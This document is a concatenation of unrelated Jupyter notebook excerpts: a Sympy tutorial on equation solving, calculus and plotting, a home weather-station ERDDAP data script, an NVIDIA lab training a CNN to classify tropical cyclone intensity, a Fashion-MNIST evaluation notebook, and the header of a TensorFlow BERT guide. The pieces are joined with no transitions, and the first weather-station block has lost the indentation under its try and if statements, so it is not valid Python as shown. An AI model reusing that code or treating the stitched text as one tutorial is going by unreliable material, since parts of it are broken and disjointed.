# We only really need to define `c` but doing them all again.
a, b, c, x = sym.symbols('a, b, c, x')
```
The Sympy command for solving equations is `solveset`. The first argument is an expression whose roots will be found. The second argument is the variable we are solving for.
```
sym.solveset(a * x ** 2 + b * x + c, x)
```
---
**EXERCISE** Use Sympy to find the solutions to the generic cubic equation:
$$a x ^ 3 + b x ^ 2 + c x + d = 0$$
---
It is possible to pass more arguments to `solveset` for example to constrain the solution space. Let us see what the solution of the following is in $\mathbb{R}$:
$$x^2=-1$$
```
sym.solveset(x ** 2 + 1, x, domain=sym.S.Reals)
```
---
**EXERCISE** Use Sympy to find the solutions to the following equations:
- $x ^ 2 = 2$ in $\mathbb{N}$;
- $x ^ 3 + 2 x = 0$ in $\mathbb{R}$.
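One possible approach to the second equation, as a sketch: $x^3 + 2x = x(x^2 + 2)$, so $0$ is the only real root.

```
import sympy as sym

x = sym.symbols('x')
sols = sym.solveset(x ** 3 + 2 * x, x, domain=sym.S.Reals)
print(sols)  # the other two roots are imaginary, so only {0} remains
```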
---
## Symbolic calculus
We can use Sympy to compute limits. Let us calculate:
$$\lim_{x\to 0^+}\frac{1}{x}$$
```
sym.limit(1/x, x, 0, dir="+")
```
---
**EXERCISE** Compute the following limits:
1. $\lim_{x\to 0^-}\frac{1}{x}$
2. $\lim_{x\to 0}\frac{1}{x^2}$
---
We can also use Sympy to differentiate and integrate. Let us experiment with differentiating the following expression:
$$x ^ 2 - \cos(x)$$
```
sym.diff(x ** 2 - sym.cos(x), x)
```
Similarly we can integrate:
```
sym.integrate(x ** 2 - sym.cos(x), x)
```
We can also carry out definite integrals:
```
sym.integrate(x ** 2 - sym.cos(x), (x, 0, 5))
```
---
**EXERCISE** Use Sympy to calculate the following:
1. $\frac{d\sin(x ^2)}{dx}$
2. $\frac{d(x ^2 + xy - \ln(y))}{dy}$
3. $\int e^x \cos(x)\;dx$
4. $\int_0^5 e^{2x}\;dx$
## Plotting with Sympy
Finally, Sympy can be used to plot functions. Note that this makes use of another Python library called [matplotlib](http://matplotlib.org/). While Sympy saves us from having to use matplotlib directly, matplotlib itself is worth learning, as it's a very powerful and versatile library.
Before plotting in Jupyter we need to run a command to tell it to display the plots directly in the notebook:
```
%matplotlib inline
```
Let us plot $x^2$:
```
expr = x ** 2
p = sym.plot(expr);
```
We can directly save that plot to a file if we wish to:
```
p.save("x_squared.pdf");
```
---
**EXERCISE** Plot the following functions:
- $y=x + \cos(x)$
- $y=x ^ 2 - e^x$ (you might find `ylim` helpful as an argument)
Experiment with saving your plots to a file.
---
## Summary
This section has discussed using Sympy to:
- Manipulate symbolic expressions;
- Calculate limits, derivatives and integrals;
- Plot a symbolic expression.
This just touches the surface of what Sympy can do.
Let us move on to using [Numpy](02 - Linear algebra with Numpy.ipynb) to do Linear Algebra.
# Climate Data from Home System
```
from erddapy import ERDDAP
import pandas as pd
import datetime
# HTTPError is used in the try/except blocks below (assuming a requests-based erddapy)
from requests.exceptions import HTTPError
# for secondary/derived parameters
from metpy.units import units
import metpy.calc as mpcalc
server_url = 'http://raspberrypi.local:8080/erddap'
#server_url = 'http://192.168.2.3:8080/erddap'
e = ERDDAP(server=server_url)
df = pd.read_csv(e.get_search_url(response='csv', search_for='MoonFlower'))
print(df['Dataset ID'].values)
dataset_id='tempest_moonflower_wx'
try:
d = ERDDAP(server=server_url,
protocol='tabledap',
response='csv'
)
d.dataset_id=dataset_id
except HTTPError:
print('Failed to generate url {}'.format(dataset_id))
try:
df_m = d.to_pandas(
index_col='time (UTC)',
parse_dates=True,
skiprows=(1,) # units information can be dropped.
)
df_m.sort_index(inplace=True)
df_m.columns = [x[1].split()[0] for x in enumerate(df_m.columns)]
except:
print(f"something failed in data download {dataset_id}")
pass
df_m.drop(columns=['device_id', 'bucket_step_minutes', 'wind_lull','wind_interval'],inplace=True)
#stats are all utc driven - but we really want local daily values
df_m=df_m.tz_convert('US/Pacific')
# calculations of various parameters... metpy?
# HDD/CDD, dewpointTemp
df_m['dewpointTemp']=mpcalc.dewpoint_from_relative_humidity(df_m.temperature.values * units.degC,
df_m.humidity.values * units.percent)
#wetbulb from metpy had issues
# Reduce station pressure to sea level (the 87.3 constant appears to be the station elevation in metres)
df_m['SLP']=df_m.pressure.values * (1+((1013.25/df_m.pressure.values)**((287.05*0.0065)/9.80665)) * (0.0065*87.3)/288.15)**(9.80665/(287.05*0.0065))
df_daily_max = df_m.resample('D').max()
df_daily_min = df_m.resample('D').min()
df_daily_ave = df_m.resample('D').mean()
df_daily_total = df_m.resample('1T').mean().resample('D').sum()
df_m.sample()
use_current_month = True
if use_current_month:
current_month = datetime.datetime.now().month
else:
current_month = 7
current_month_grid_data=pd.DataFrame()
current_month_grid_data = df_daily_max[df_daily_max.index.month==current_month].temperature
current_month_grid_data = pd.concat([current_month_grid_data,
df_daily_min[df_daily_min.index.month==current_month].temperature.round(1),
df_daily_ave[df_daily_ave.index.month==current_month].temperature.round(1),
df_daily_ave[df_daily_ave.index.month==current_month].dewpointTemp.round(1),
df_daily_ave[df_daily_ave.index.month==current_month].SLP.round(1),
df_daily_total[df_daily_total.index.month==current_month].solar_radiation.round(0),
df_daily_max[df_daily_max.index.month==current_month].uv.round(1),
df_daily_ave[df_daily_ave.index.month==current_month].wind_avg.round(1),
df_daily_ave[df_daily_ave.index.month==current_month].wind_dir.astype(int),
df_daily_max[df_daily_max.index.month==current_month].wind_gust.round(1)
],axis=1)
current_month_grid_data.columns=('max_temperature','min_temperature','mean_temperature','mean_dewpoint','mean SLP','total_solar_radiation','max_uv_index','average speed','average dir','max gust')
current_month_grid_data['station_id'] = 'tempest'
#this should go to erddap
current_month_grid_data.to_csv(f'Data/MoonflowerTempest_2020{str(current_month).zfill(2)}.csv')
def highlight_max(s):
    '''
    highlight the maximum in a Series in red.
    '''
    is_max = s == s.max()
    return ['color: red' if v else '' for v in is_max]
def highlight_min(s):
    '''
    highlight the minimum in a Series in blue.
    '''
    is_min = s == s.min()
    return ['color: blue' if v else '' for v in is_min]
current_month_grid_data.drop('station_id',axis=1).style.apply(highlight_max).apply(highlight_min).format("{:.2f}")
### need to manage daily records, monthly records, alltime records
```
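The records TODO in the cell above could be sketched as follows (a rough approach with hypothetical names, not part of the existing pipeline): keep a running store of extremes and update it whenever a new daily value beats the stored one.

```
def update_records(records, day, tmax):
    """Keep the highest daily max temperature seen so far (hypothetical helper)."""
    if tmax > records.get("all_time_tmax", float("-inf")):
        records["all_time_tmax"] = tmax
        records["all_time_tmax_day"] = day
    return records

records = {}
for day, tmax in [("2020-07-01", 31.2), ("2020-07-02", 29.8), ("2020-07-03", 33.4)]:
    records = update_records(records, day, tmax)
print(records)  # the 33.4 degC day holds the record
```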
## repeat for each sensor on property
Choose a month, or use the current one (starting with data subsetting).
```
if use_current_month:
constraints = {
'time>=': datetime.datetime.now().strftime('%Y-%m-01T00:00:00Z'),
}
else:
constraints = {
'time>=': '2020-01-01T00:00:00Z',
'time<=': '2027-02-10T00:00:00Z',
}
alldatasets=['channel_1314759_thingspeak',
'channel_1027974_thingspeak',
'channel_1037066_thingspeak',
'channel_1047747_thingspeak',
'channel_843357_thingspeak',
'channel_rpi']
df_all = {}
for dataset_id in alldatasets:
    try:
        d = ERDDAP(server=server_url,
                   protocol='tabledap',
                   response='csv')
        d.dataset_id = dataset_id
        d.constraints = constraints
    except HTTPError:
        print('Failed to generate url {}'.format(dataset_id))
        continue
    try:
        df_m = d.to_pandas(
            index_col='time (UTC)',
            parse_dates=True,
            skiprows=(1,)  # units information can be dropped
        )
        df_m.sort_index(inplace=True)
        df_m.columns = [c.split()[0] for c in df_m.columns]
    except Exception:
        print(f"something failed in data download {dataset_id}")
        continue
    # stats are all UTC driven - but we really want local daily values
    df_m = df_m.tz_convert('US/Pacific')
    df_all.update({dataset_id: df_m})

# calculations of various parameters... metpy?
# HDD/CDD, dewpointTemp
for v in df_all:
    print(df_all[v].keys())

if use_current_month:
    current_month = datetime.datetime.now().month
else:
    current_month = 7

for v in df_all:
    print(df_all[v].keys())
    df_daily_max = df_all[v].resample('D').max()
    df_daily_min = df_all[v].resample('D').min()
    df_daily_ave = df_all[v].resample('D').mean()
    has_rh = 'RH_Percent' in df_all[v].keys()
    has_temp = 'temperature' in df_all[v].keys()
    has_baro = 'Barotemperature' in df_all[v].keys()
    if has_rh and has_temp and not has_baro:
        print(f"processing {v} :0")
        current_month_grid_data = df_daily_max[df_daily_max.index.month == current_month].temperature
        current_month_grid_data = pd.concat([current_month_grid_data,
                                             df_daily_min[df_daily_min.index.month == current_month].temperature.round(1),
                                             df_daily_ave[df_daily_ave.index.month == current_month].temperature.round(1),
                                             df_daily_ave[df_daily_ave.index.month == current_month].RH_Percent.round(1),
                                             ], axis=1)
        current_month_grid_data.columns = ('max_temperature', 'min_temperature', 'mean_temperature', 'mean_humidity')
        current_month_grid_data['station_id'] = v
        current_month_grid_data.to_csv(f'Data/{v}_2020{str(current_month).zfill(2)}.csv')
    elif not has_rh and has_temp and not has_baro:
        print(f"processing {v} :1")
        current_month_grid_data = df_daily_max[df_daily_max.index.month == current_month].temperature
        current_month_grid_data = pd.concat([current_month_grid_data,
                                             df_daily_min[df_daily_min.index.month == current_month].temperature.round(1),
                                             df_daily_ave[df_daily_ave.index.month == current_month].temperature.round(1),
                                             ], axis=1)
        current_month_grid_data.columns = ('max_temperature', 'min_temperature', 'mean_temperature')
        current_month_grid_data['station_id'] = v
        # this should go to erddap
        current_month_grid_data.to_csv(f'Data/{v}_2020{str(current_month).zfill(2)}.csv')
    elif has_rh and has_temp and has_baro:
        print(f"processing {v} :2")
        current_month_grid_data = df_daily_max[df_daily_max.index.month == current_month].Barotemperature
        current_month_grid_data = pd.concat([current_month_grid_data,
                                             df_daily_min[df_daily_min.index.month == current_month].Barotemperature.round(1),
                                             df_daily_ave[df_daily_ave.index.month == current_month].Barotemperature.round(1),
                                             ], axis=1)
        current_month_grid_data.columns = ('max_temperature', 'min_temperature', 'mean_temperature')
        current_month_grid_data['station_id'] = v
        # this should go to erddap
        current_month_grid_data.to_csv(f'Data/{v}_2020{str(current_month).zfill(2)}.csv')
    else:
        print(f"passing {v} :3")
    print(f'{v}')

current_month_grid_data.drop('station_id', axis=1).style.apply(highlight_max).apply(highlight_min).format("{:.2f}")
```
[Home Page](../Start_Here.ipynb)
[Previous Notebook](Approach_to_the_Problem_&_Inspecting_and_Cleaning_the_Required_Data.ipynb)
[1](The_Problem_Statement.ipynb)
[2](Approach_to_the_Problem_&_Inspecting_and_Cleaning_the_Required_Data.ipynb)
[3]
[4](Countering_Data_Imbalance.ipynb)
[5](Competition.ipynb)
[Next Notebook](Countering_Data_Imbalance.ipynb)
# Tropical Cyclone Intensity Estimation using a Deep Convolutional Neural Network - Part 2
**Contents of this notebook:**
- [Understand the Model Requirements](#Understand-the-Model-requirements)
- [Exploring Resizing Options](#Exploring-different-types-of-resizing-options)
- [Choosing a Random Patch](#Step-2-:-Choosing-a-Random-Patch-from-the-Image)
- [Annotating Our Dataset ](#Annotating-our-dataset)
- [Wrapping Things Up](#Wrapping-Things-Up-:)
- [Preparing the Dataset](#Preparing-the-Dataset)
- [Defining our Model](#Defining-our-Model)
- [Compiling and Training our Model](#Compiling-and-Training-our-Model)
- [Visualisations](#Visualisations)
**By the end of this Notebook you will:**
- Understand the Model Requirements.
- Annotate the Dataset.
- Train your Model.
## Understand the Model requirements
### We have seen the model to which our image will be fed
- The model described in the paper

We can see that the images need to be ( 232, 232, 3) in shape to be fed into our model.
So, we will do the following steps before feeding the image into our model.
- Step 1 : Resize Image from ( 1024, 1024 ,3) to ( 256 , 256 ,3 )
- Step 2 : Choose a random ( 232 , 232 , 3 ) patch from the ( 256 , 256 , 3 ) and feed into our model.
**Alternate Approach** : We could modify the model's input shape to ( 256 x 256 x 3 ) and train it on the scaled images, but we instead take a random ( 232 x 232 x 3 ) patch so that our model does not expect the cyclone to be at the center and learns the mapping even when the cyclone lies towards the sides of the image.
### Step 1 :
Let's now start with Step 1 and understand all the resizing methods available to do so.
```
import cv2
#Read the Image Using cv2.imread()
img = cv2.imread('images/image_shape.jpg',1)
#Changing the Color Spaces
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# Print the Shape of the Image
img.shape
%matplotlib inline
import matplotlib.pyplot as plt
#Plot the image
plt.imshow(img)
```
## Exploring different types of resizing options
The Images can be resized in different ways. Some methods are as follows (as stated in OpenCV documentation) :
<h3>Scaling</h3>
<p>Scaling is just resizing of the image. OpenCV comes with a function <b>cv2.resize()</b> for this purpose. The size of the image can be specified manually, or you can specify the scaling factor. Different interpolation methods are used. Preferable interpolation methods are <b>cv2.INTER_AREA</b> for shrinking and <b>cv2.INTER_CUBIC</b> (slow) & <b>cv2.INTER_LINEAR</b> for zooming. By default, interpolation method used is <b>cv2.INTER_LINEAR</b> for all resizing purposes.</p>
* cv2.INTER_AREA ( Preferable for Shrinking )
* cv2.INTER_CUBIC ( Preferable for Zooming but slow )
* cv2.INTER_LINEAR ( Preferable for Zooming and the default option )
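To build intuition for what area interpolation does when shrinking, here is a minimal NumPy-only sketch (not OpenCV's actual implementation): each output pixel is the mean of a block of input pixels, assuming the block size divides the image evenly.

```python
import numpy as np

def area_downsample(img, factor):
    # INTER_AREA-style shrinking: each output pixel is the mean of a
    # factor x factor block of input pixels (assumes even divisibility)
    h, w = img.shape[:2]
    return img.reshape(h // factor, factor, w // factor, factor, -1).mean(axis=(1, 3))

small = area_downsample(np.arange(4 * 4 * 3, dtype=float).reshape(4, 4, 3), 2)
print(small.shape)  # (2, 2, 3)
```

`cv2.resize` with `cv2.INTER_AREA` performs a refined version of this averaging, which is why it avoids aliasing when shrinking.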
### Step 2 : Choosing a Random Patch from the Image
We will use the `np.random.randint()` function from NumPy to generate random numbers. The parameters used here are the (exclusive) upper limit and the size of the output array, as described in the [Numpy Documentation](https://numpy.org/doc/stable/reference/random/generated/numpy.random.randint.html)
## Wrapping things up
```
#Import numpy to Generate Random Numbers
import numpy as np
#Generate random number from [0,0] to [23,23] and define start and end points
start_pt= np.random.randint(24,size=2)
end_pt = start_pt + [232,232]
# Scale Image and Take a Random patch from it
img = cv2.resize(img,(256,256))
rand = img[start_pt[0]:end_pt[0],start_pt[1]:end_pt[1]]
plt.imshow(rand)
rand.shape
```
The final image is obtained with shape (232, 232, 3)
# Annotating our dataset
Let us start by taking Hurricane Katrina (2005) as an example and then scale the process to all the cyclones
```
import pandas as pd
# Read the CSV we saved earlier
df = pd.read_csv('atlantic_storms.csv')
# Create a Mask to Filter our Katrina Cyclone (2005)
mask = (df['date'] > '2005-01-01') & (df['date'] <= '2006-01-01') & ( df['name'] == 'KATRINA')
# Apply the Mask to the Original Data Frame and Extract the new Dataframe
new_df = df.loc[mask]
new_df
#Getting the list of Images from Our Dataset for Katrina
import os
e = os.listdir('Dataset/tcdat/tc05/ATL/12L.KATRINA/ir/geo/1km')
e.sort()
#Show First five images
e[:5]
```
#### We can observe that the images are taken once every 30 minutes, but the text data is available only once every 6 hours. So we will interpolate the text data to obtain a value for every image
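The cells below fit a spline with `scipy.interpolate`; as a simpler sketch of the same idea (with made-up wind speeds, not the Katrina data), linear interpolation with `np.interp` looks like this:

```python
import numpy as np

# Hypothetical best-track wind speeds recorded every 6 hours,
# expressed in seconds elapsed from the first record
obs_t = np.array([0.0, 6 * 3600, 12 * 3600])
obs_v = np.array([30.0, 40.0, 60.0])  # knots

# Image timestamps every 30 minutes inside the observed window
img_t = np.arange(0, 12 * 3600 + 1, 1800)
img_v = np.interp(img_t, obs_t, obs_v)
print(img_v[0], img_v[6])  # 30.0 at t=0, 35.0 halfway between the first two records
```

A spline (as used below) fits a smooth curve through the observations instead of straight segments, but the interpolation-to-image-timestamps idea is the same.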
```
#Get list of Dates and Velocity from the New Dataframe
date_list = new_df['date'].tolist()
velocity_list = new_df['maximum_sustained_wind_knots'].tolist()
print(date_list[:5])
type(date_list[0])
```
The dates are in string format, which we will now convert to datetime objects to work with.
```
from datetime import datetime
# Convert the first and last recorded times of the text data to datetime format
first = (datetime.strptime(date_list[0], "%Y-%m-%d %H:%M:%S"))
last = (datetime.strptime(date_list[-1], "%Y-%m-%d %H:%M:%S"))
print(first)
type(first)
# Convert each date to seconds elapsed since the first record so the data can be interpolated
for i in range(len(date_list)):
    date_list[i] = (datetime.strptime(date_list[i], "%Y-%m-%d %H:%M:%S") - first).total_seconds()
    print(date_list[i])
# Interpolate using the SciPy library function
from scipy import interpolate
func = interpolate.splrep(date_list,velocity_list)
#Getting List of Katrina Images
import os
e = os.listdir('Dataset/tcdat/tc05/ATL/12L.KATRINA/ir/geo/1km')
# Sort images by time
e.sort()
x=[]
y=[]
for m in e:
    try:
        # Strip the timestamp from the image filename and convert it to a datetime
        time_img = datetime.strptime(m[:13], "%Y%m%d.%H%M")
        # If the image was taken within the window covered by the text data
        if time_img >= first and time_img <= last:
            # Get the interpolated value for that time and save it
            value = int(interpolate.splev((time_img - first).total_seconds(), func))
            x.append((time_img - first).total_seconds())
            y.append(value)
    except Exception:
        pass
import matplotlib.pyplot as plt
# Plot All the Saved Data Points
f = plt.figure(figsize=(24,10))
ax = f.add_subplot(121)
ax2 = f.add_subplot(122)
ax.title.set_text('Data points from CSV file')
ax2.title.set_text('Interpolated from CSV file to images')
ax.plot(date_list,velocity_list,'-o')
ax2.plot(x,y)
```
### Now we have interpolated and found the relevant velocity for every image within the recorded timeframe. Let us now use it to train our model.
# Wrapping Things Up :
### Preparing the Dataset
##### All the above modules are joined together into a single function to load the data
```
import sys
sys.path.append('/workspace/python/source_code')
# Import utility functions
from utils import *
# Load dataset
filenames,labels = load_dataset()
val_filenames , val_labels = make_test_set(filenames,labels,val=0.1)
```
# Understand our dataset :
We can see the following lines from the Output :
`[344, 344, 344, 344, 344, 344, 344, 344]` and `{2: 7936, 3: 5339, 1: 3803, 4: 2934, 5: 2336, 6: 2178, 7: 204, 0: 100}`
This is the distribution of our validation set and training set over their classes.
For the validation set we use a *stratified* split so that the validation set closely mirrors the class distribution of the whole dataset.
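As a sketch of the stratified idea (not the actual implementation inside `make_test_set`, which we have not inspected): sample the same fraction of indices from every class, so the held-out set mirrors the full class distribution.

```python
import numpy as np

def stratified_indices(labels, frac, seed=0):
    # Sample `frac` of the indices from each class separately
    rng = np.random.default_rng(seed)
    labels = np.asarray(labels)
    held = []
    for c in np.unique(labels):
        idx = np.flatnonzero(labels == c)
        rng.shuffle(idx)
        held.extend(idx[: int(len(idx) * frac)])
    return sorted(held)

labels = [0] * 100 + [1] * 50 + [2] * 10
held = stratified_indices(labels, 0.1)
print(len(held))  # 16 -> 10 + 5 + 1, preserving the 10:5:1 class ratio
```

A plain random 10% sample could easily miss the rare class entirely; per-class sampling cannot.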
```
#Make train test set
test = 0.2
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(filenames, labels, test_size=test, random_state=1)
```
# One-Hot Encoding
`y_train` is a list containing values from 0-7, such as [ 2, 4, 5, ... ], but our model needs each output encoded as a 1D vector :
2 --- > [ 0 , 0 , 1 , 0 , 0 , 0 , 0 , 0]
4 --- > [ 0 , 0 , 0 , 0 , 1 , 0 , 0 , 0]
The encoding keeps the other positions at 0, which is necessary for the model to compute the loss and use backpropagation to learn the _Weight Matrix_.
The below given image is an example of One-Hot Encoding :

Reference : [What is One Hot Encoding and How to Do It](https://medium.com/@michaeldelsole/what-is-one-hot-encoding-and-how-to-do-it-f0ae272f1179)
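The next cell uses `tf.one_hot`; the same encoding can be sketched in plain NumPy by indexing an identity matrix:

```python
import numpy as np

y = np.array([2, 4, 0])
one_hot = np.eye(8)[y]  # row i of eye(8) is the one-hot vector for class i
print(one_hot[0])  # [0. 0. 1. 0. 0. 0. 0. 0.]
```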
```
import tensorflow as tf
y_train = tf.one_hot(y_train,depth=8)
y_test = tf.one_hot(y_test,depth=8)
val_labels = tf.one_hot(val_labels,depth=8)
train,test,val = make_dataset((x_train,y_train,128),(x_test,y_test,32),(val_filenames,val_labels,32))
```
### Defining our Model

We will be Implementing this model in Keras using the following code
```
import numpy as np
import os
os.environ["CUDA_VISIBLE_DEVICES"]="0"
tf.random.set_seed(1337)
import tensorflow.keras
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Conv2D, Flatten ,Dropout, MaxPooling2D
from tensorflow.keras import backend as K
#Reset Graphs and Create Sequential model
K.clear_session()
model = Sequential()
#Convolution Layers
model.add(Conv2D(64, kernel_size=10,strides=3, activation='relu', input_shape=(232,232,3)))
model.add(MaxPooling2D(pool_size=(3, 3),strides=2))
model.add(Conv2D(256, kernel_size=5,strides=1,activation='relu'))
model.add(MaxPooling2D(pool_size=(3, 3),strides=2))
model.add(Conv2D(288, kernel_size=3,strides=1,padding='same',activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2),strides=1))
model.add(Conv2D(272, kernel_size=3,strides=1,padding='same',activation='relu'))
model.add(Conv2D(256, kernel_size=3,strides=1,activation='relu'))
model.add(MaxPooling2D(pool_size=(3, 3),strides=2))
model.add(Dropout(0.5))
model.add(Flatten())
#Linear Layers
model.add(Dense(3584,activation='relu'))
model.add(Dense(2048,activation='relu'))
model.add(Dense(8, activation='softmax'))
# Print Model Summary
model.summary()
```
### Compiling and Training our Model
We will be using the following :
- Optimizer : SGD ( Stochastic Gradient Descent ) with parameters mentioned in the research paper.
- Learning Rate : 0.001
- Momentum : 0.9
- Loss Function : Categorical Cross Entropy ( Used in Multi-class classification )
- Metrics : We will be using two metrics to determine how our model performs
- Accuracy : Number of Predictions correct / Total number of Predictions
- Top-2 Accuracy : the prediction counts as correct if either of the model's two highest-probability classes matches the expected answer.
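A NumPy sketch of how top-2 accuracy can be computed from predicted probabilities (Keras's `top_k_categorical_accuracy`, used below, does the equivalent on tensors):

```python
import numpy as np

def top_k_accuracy(probs, labels, k=2):
    # Correct if the true class is among the k highest-probability classes
    topk = np.argsort(probs, axis=1)[:, -k:]
    return float(np.mean([labels[i] in topk[i] for i in range(len(labels))]))

probs = np.array([[0.1, 0.5, 0.4],
                  [0.6, 0.3, 0.1]])
print(top_k_accuracy(probs, [2, 1]))  # 1.0 -> both true labels are in the top 2
```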
```
import functools
# Include Top-2 Accuracy Metrics
top2_acc = functools.partial(tensorflow.keras.metrics.top_k_categorical_accuracy, k=2)
top2_acc.__name__ = 'top2_acc'
#Define Number of Epochs
epochs = 4
#But Training our model from scratch will take a long time
#So we will load a partially trained model to speedup the process
model.load_weights("trained_16.h5")
# Optimizer
sgd = tensorflow.keras.optimizers.SGD(lr=0.001, decay=1e-6, momentum=0.9)
#Compile Model with Loss Function , Optimizer and Metrics
model.compile(loss=tensorflow.keras.losses.categorical_crossentropy,
optimizer=sgd,
metrics=['accuracy',top2_acc])
# Train the Model
trained_model = model.fit(train,
epochs=epochs,
verbose=1,
validation_data=val)
# Evaluate the Model against the Test Set
score = model.evaluate(test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
```
### Visualisations
Let us now visualise how our model performed during the training process :
```
import matplotlib.pyplot as plt
f = plt.figure(figsize=(15,5))
ax = f.add_subplot(121)
ax.plot(trained_model.history['accuracy'])
ax.plot(trained_model.history['val_accuracy'])
ax.set_title('Model Accuracy')
ax.set_ylabel('Accuracy')
ax.set_xlabel('Epoch')
ax.legend(['Train', 'Val'])
ax2 = f.add_subplot(122)
ax2.plot(trained_model.history['loss'])
ax2.plot(trained_model.history['val_loss'])
ax2.set_title('Model Loss')
ax2.set_ylabel('Loss')
ax2.set_xlabel('Epoch')
ax2.legend(['Train', 'Val'],loc= 'upper left')
plt.show()
```
## Confusion Matrix :
A confusion matrix is a table that is often used to describe the performance of a classification model (or "classifier") on a set of test data for which the true values are known.
Here, each row corresponds to the true class and each column to the predicted class (this is the convention of `sklearn.metrics.confusion_matrix`). From this we can estimate how our model performs over the different classes, which in turn helps us determine how our data should be fed into the model.
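The cell below uses `sklearn.metrics.confusion_matrix`; the computation itself is just a tally, sketched here in NumPy:

```python
import numpy as np

def confusion(y_true, y_pred, n_classes):
    # cm[i, j] counts samples whose true class is i and predicted class is j
    cm = np.zeros((n_classes, n_classes), dtype=int)
    for t, p in zip(y_true, y_pred):
        cm[t, p] += 1
    return cm

cm = confusion([0, 1, 1, 2], [0, 1, 2, 2], n_classes=3)
print(cm.trace())  # 3 -> correct predictions sit on the diagonal
```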
```
import seaborn as sn
from sklearn.metrics import confusion_matrix
import pandas as pd
#Plotting a heatmap using the confusion matrix
pred = model.predict(val)
p = np.argmax(pred, axis=1)
y_valid = np.argmax(val_labels, axis=1, out=None)
results = confusion_matrix(y_valid, p)
classes=['NC','TD','TC','H1','H2','H3','H4','H5']
df_cm = pd.DataFrame(results, index = [i for i in classes], columns = [i for i in classes])
plt.figure(figsize = (15,15))
sn.heatmap(df_cm, annot=True, cmap="Blues")
```
### Congratulations on running your first model. In the next notebook, let us try to understand the drawbacks of this model and make it better :
We can notice that the validation accuracy is lower than the training accuracy. This is because the model is not properly regularised, and the possible reasons are :
**Not enough data-points / Imbalanced classes**
Using different techniques, we will regularise and normalise the model in the upcoming notebook.
## Important:
<mark>Shutdown the kernel before clicking on “Next Notebook” to free up the GPU memory.</mark>
## Licensing
This material is released by NVIDIA Corporation under the Creative Commons Attribution 4.0 International (CC BY 4.0)
```
# Helper libraries
import numpy as np
import matplotlib.pyplot as plt
# TensorFlow and tf.keras
import tensorflow as tf
from tensorflow import keras
```
### Train
More on model saving: https://www.tensorflow.org/alpha/guide/keras/saving_and_serializing
```
# %run 102_mnist_fashion.py --output outputs/102_mnist_fashion.h5 --epochs 10 --verbose 1
```
### Explore Data
```
fashion_mnist = keras.datasets.fashion_mnist
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
plt.figure()
plt.imshow(train_images[0])
plt.colorbar()
plt.grid(False)
plt.show()
train_images = train_images / 255.0
test_images = test_images / 255.0
plt.figure(figsize=(10,10))
for i in range(25):
    plt.subplot(5, 5, i + 1)
    plt.xticks([])
    plt.yticks([])
    plt.grid(False)
    plt.imshow(train_images[i], cmap=plt.cm.binary)
    plt.xlabel(class_names[train_labels[i]])
plt.show()
```
### Evaluate Model
```
model = keras.models.load_model('outputs/102_mnist_fashion.h5')
# fix error: "OMP: Error #15: Initializing libiomp5.dylib, but found libiomp5.dylib already initialized."
import os
os.environ['KMP_DUPLICATE_LIB_OK']='True'
predictions = model.predict(test_images)
def plot_image(i, predictions_array, true_label, img):
    predictions_array, true_label, img = predictions_array[i], true_label[i], img[i]
    plt.grid(False)
    plt.xticks([])
    plt.yticks([])
    plt.imshow(img, cmap=plt.cm.binary)
    predicted_label = np.argmax(predictions_array)
    if predicted_label == true_label:
        color = 'blue'
    else:
        color = 'red'
    plt.xlabel("{} {:2.0f}% ({})".format(class_names[predicted_label],
                                         100*np.max(predictions_array),
                                         class_names[true_label]),
               color=color)
def plot_value_array(i, predictions_array, true_label):
    predictions_array, true_label = predictions_array[i], true_label[i]
    plt.grid(False)
    plt.xticks([])
    plt.yticks([])
    thisplot = plt.bar(range(10), predictions_array, color="#777777")
    plt.ylim([0, 1])
    predicted_label = np.argmax(predictions_array)
    thisplot[predicted_label].set_color('red')
    thisplot[true_label].set_color('blue')
i = 0
plt.figure(figsize=(6,3))
plt.subplot(1,2,1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(1,2,2)
plot_value_array(i, predictions, test_labels)
plt.show()
i = 12
plt.figure(figsize=(6,3))
plt.subplot(1,2,1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(1,2,2)
plot_value_array(i, predictions, test_labels)
plt.show()
# Plot the first X test images, their predicted label, and the true label
# Color correct predictions in blue, incorrect predictions in red
num_rows = 5
num_cols = 3
num_images = num_rows*num_cols
plt.figure(figsize=(2*2*num_cols, 2*num_rows))
for i in range(num_images):
    plt.subplot(num_rows, 2*num_cols, 2*i+1)
    plot_image(i, predictions, test_labels, test_images)
    plt.subplot(num_rows, 2*num_cols, 2*i+2)
    plot_value_array(i, predictions, test_labels)
plt.show()
# Grab an image from the test dataset
img = test_images[0]
# Add the image to a batch where it's the only member.
img = (np.expand_dims(img, 0))
predictions_single = model.predict(img)
print(predictions_single)
plot_value_array(0, predictions_single, test_labels)
_ = plt.xticks(range(10), class_names, rotation=45)
```
##### Copyright 2021 The TensorFlow Authors.
```
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
```
# BERT Preprocessing with TF Text
<table class="tfo-notebook-buttons" align="left">
<td>
<a target="_blank" href="https://www.tensorflow.org/text/guide/bert_preprocessing_guide"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a>
</td>
<td>
<a target="_blank" href="https://colab.research.google.com/github/tensorflow/text/blob/master/docs/guide/bert_preprocessing_guide.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
</td>
<td>
<a target="_blank" href="https://github.com/tensorflow/text/blob/master/docs/guide/bert_preprocessing_guide.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View on GitHub</a>
</td>
<td>
<a href="https://storage.googleapis.com/tensorflow_docs/text/docs/guide/bert_preprocessing_guide.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a>
</td>
</table>
## Overview
